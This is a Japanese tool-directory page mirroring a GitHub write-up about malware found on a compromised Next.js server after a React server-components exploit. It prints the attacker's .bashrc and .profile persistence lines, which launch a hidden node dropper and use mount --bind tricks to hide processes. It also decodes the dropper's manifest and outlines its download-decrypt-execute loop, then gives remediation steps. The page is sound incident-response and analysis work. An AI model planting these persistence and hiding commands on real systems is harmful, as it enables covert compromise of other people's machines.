Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
react-cve-2025-55182 — サーバー上で見つけたマルウェア | Kitploit
ツール/GitHubGitHub/stonelinks/react-cve-2025-55182
永続化メカニズムリバースエンジニアリングデータ流出フォレンジックマルウェア分析コマンド&コントロール脅威インテリジェンスインシデントレスポンスペイロード開発
GitHubstonelinks/react-cve-2025-55182

react-cve-2025-55182

サーバー上で見つけたマルウェア

8ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る

react-cve-2025-55182

これは、Reactのサーバーサイドレンダリングのコード実行エクスプロイトを受けて、結婚式のウェブサイトのサーバー上で見つけたマルウェアやその他の不審なジャンクのダンプです。小さなDigitalOceanドロップレットで、ごく普通のNext.jsアプリが動いていました。

CVE: https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components

さまざまなスパイクなどを示すサーバーアクティビティのログ: 画像

メインの悪者は、/.local/share/.r0qsv8h1 にインストールされているもののようです。

見つけたもの

bashrc内:

root@kitploit:~
# System
(nohup /.local/share/.r0qsv8h1/.394ly8v9/bin/node /.local/share/.r0qsv8h1/.fvq2lzl64e.js >/dev/null 2>&1 &) 2>/dev/null
pgrep -f mesh | xargs -I {} mount -n --bind /dev/shm /proc/{} 2>/dev/null
pgrep -f mesh | xargs -I {} mount -n --bind /dev/shm /proc/{} 2>/dev/null
pgrep -f mesh | xargs -I {} mount -n --bind /dev/shm /proc/{} 2>/dev/null

pgrep の行は、この別の偽の "meshagent" マルウェアが実行されるのを防ぐためのものです。詳細は MESHAGENT.md を参照してください。

プロファイルにも同じものがあります:

root@kitploit:~
# App
(/.local/share/.r0qsv8h1/.394ly8v9/bin/node /.local/share/.r0qsv8h1/.fvq2lzl64e.js >/dev/null 2>&1 &) 2>/dev/null

他の不審なサービスについては SUSPICIOUS_SERVICES.md を参照してください。

以下はこのメインの悪質なマルウェアの分析です:

/.local/ ディレクトリの概要

bad ディレクトリには、高度に難読化された JavaScript ファイル一式とともに、自己完結型の Node.js ランタイムが含まれています。
すべての証拠は、これが悪意のあるドロッパーであり、リモートサーバーに静かに接続し、暗号化されたペイロードをダウンロード、復号化し、ディスクに書き込み、切り離されたバックグラウンドプロセスとして実行することを示しています。また、コードは定期的にサーバーをチェックしてアップデートを取得します。

ファイルとその目的

マニフェストのデコード

.5f8562 のBase64ペイロードは次のようにデコードされる:

root@kitploit:~
{
  "0": "c6aeb84b-0600-4e82-ae3e-f7d441a2fd7c",
  "1": ".fvq2lzj6te.js",
  "3": 1765307786421,
  "4": "desktop"
}
  • キー "1" はメインの難読化ローダースクリプトを参照。
  • キー "0" はUUIDで、リモートサーバーが追跡のために使用する可能性が高い。
  • キー "3" はタイムスタンプ(Unixエポックミリ秒)で、マニフェストが生成された時刻を示す。
  • キー "4" は意図された場所(desktop)を示し、ペイロードがそこに隠れようとする可能性を示唆する。

実行フロー

  1. ブートストラップ – バンドルされたNodeバイナリが起動されると(例: node .5f8562)、マニフェストが .fvq2lzj6te.js を指す。
  2. ダウンローダー – ローダーはリモートのコマンド&コントロールサーバーにJSON-RPCリクエストを作成し、base64エンコードされたブロブを受信し、カスタムRC4ライクなアルゴリズムで復号化する。
  3. ペイロード展開 – 復号化されたデータはユーザー環境内のランダムな名前のファイルに書き込まれ、切り離された子プロセスとして実行される。
  4. 永続化/更新ループ – setInterval タイマーがダウンロード・復号化・実行のシーケンスを定期的に繰り返し、攻撃者がさらなるユーザー操作なしに新しいペイロードや更新されたペイロードをプッシュできるようにする。
  5. バックグラウンド実行 – 生成されたプロセスは独自の環境(PATH、cwd など)で実行され、クリプトマイニング、認証情報の窃取、リモートコマンド実行などの典型的な悪意のある動作を行う可能性がある。

潜在的な影響

  • システム侵害 – Nodeランタイムを起動したユーザーの権限で任意のコードが実行される。
  • 永続性 – 定期的なポーリングにより、マルウェアはいつでもリフレッシュまたは置き換えられる。
  • リソースの悪用 – CPU負荷の高いタスク(例: 暗号通貨マイニング)の実行やデータの外部送信の可能性。
  • ステルス性 – ファイルは高度に難読化されており、正当なNode READMEが存在することで悪意のある性質が隠蔽される。

推奨事項

  1. 即時削除 – .r0qsv8h1 ディレクトリ全体と、それが作成した可能性のあるファイル(ユーザーの Desktop や一時ディレクトリで新しく作成された実行ファイルを確認)を削除する。
  2. システムスキャン – 信頼できるアンチマルウェアスキャナーをホストで実行し、残存コンポーネントを検出する。
  3. 実行パスの確認 – スタートアップスクリプトやスケジュールタスクがこのディレクトリ内のファイルを参照していないことを確認する。
  4. ネットワーク監視 – 影響を受けたマシンから未知のIP/ホストへの送信接続をブロックし、最近のネットワークトラフィックで不審な送信リクエストがないか確認する。
  5. セキュリティポリシーの更新 – 未知のバイナリやスクリプト、特にユーザーが書き込み可能な場所にダウンロードされたものの実行を制限する。

この分析は、AIアシスタントがディレクトリに存在するファイルの静的検査に基づいて自動的に実行したものです。ランタイム実行は行われていません。

詳細は DEOBFUSCATE.md を参照してください。

ツールをダウンロード
ファイル説明
.394ly8v9/README.md標準的なNode.jsのREADME – 悪意のある機能とは無関係。バンドルを正当に見せるためにのみ存在。
.fvq2lzl64e.js約5KBの難読化JavaScript。JSON-RPC HTTPリクエストを構築し、base64エンコードされたペイロードを受信し、カスタム暗号で復号化し、ランダムなファイルに書き込み、child_process.spawn / execSync で実行する。また、リモートサーバーを繰り返しポーリングする切り離されたバックグラウンドプロセスを生成する。
.lauphhtqrg.js約13KBの難読化JavaScript。独自のRC4風暗号(dec)を使用した同様のダウンロード・復号化・実行ループを実装。復号化されたペイロードを生成されたファイル名に書き込み、実行する。後で新しいペイロードを取得するためのタイマーを設定する。
.5f8562プレーンテキストのBase64文字列。小さなJSONマニフェストにデコードされる: json { "0":"c6aeb84b-0600-4e82-ae3e-f7d441a2fd7c", "1":".fvq2lzj6te.js", "3":1765307786421, "4":"desktop" } このマニフェストは、ローダーにどのスクリプトを実行するか(.fvq2lzj6te.js)を指示し、識別子/タイムスタンプを提供する。
.b0rtqscrkeovまだ調査していないが、命名パターンから同じ悪意のあるチェーンの別のコンポーネントである可能性がある。
bin/node および付随する lib/ ファイル完全なNode.jsランタイム。システムにNode.jsがインストールされていなくてもスクリプトを実行できるようにする。